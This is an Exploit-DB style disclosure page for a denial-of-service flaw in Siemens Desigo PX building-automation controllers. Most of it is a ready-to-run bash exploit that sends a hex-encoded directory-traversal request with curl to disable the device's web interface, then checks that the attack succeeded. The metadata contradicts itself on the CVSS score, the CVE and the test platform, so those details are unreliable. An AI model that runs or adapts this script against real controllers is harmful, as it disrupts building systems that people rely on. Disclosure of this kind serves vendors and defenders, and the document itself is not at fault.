Siemens Desigo PX 6.00 - Denial of Service (PoC)

vendor:

Desigo PX

by:

LiquidWorm

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Desigo PX

Affected Version From: 6.00

Affected Version To: 6.00.320

Patch Exists: YES

Related CWE: N/A

CPE: h:siemens:desigo_px

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: All

2019

Siemens Desigo PX 6.00 – Denial of Service (PoC)

The device contains a vulnerability that could allow an attacker to cause a denial of service condition on the device's web server by sending a specially crafted HTTP message to the web server port (tcp/80). The security vulnerability could be exploited by an attacker with network access to an affected device. Successful exploitation requires no system privileges and no user interaction. An attacker could use the vulnerability to compromise the availability of the device's web service. While tesing, the device was rebooted after the attack.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their devices to the latest version of the firmware.

Source

Exploit-DB raw data:

# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
# Author: LiquidWorm
# Date: 2019-11-14
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version:6.00
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
#                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC00-U, PXC64-U, PXC128-U
#                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
#                   With activated web server
#                   All firmware versions < V6.00.320
# CVE: N/A
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php

#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html

#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#

#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#


echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"
if [ "$#" -ne 1 ]; then
	echo -ne "\nUsage: $0 [ipaddr]\n\n"
	exit
fi
IP=$1
TARGET="http://$IP/"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$status" == "404" ]; then
	echo -ne "\n[*] Exploit successful!\n"
else
	echo -ne "\n[-] Exploit unsuccessful.\n"
	exit
fi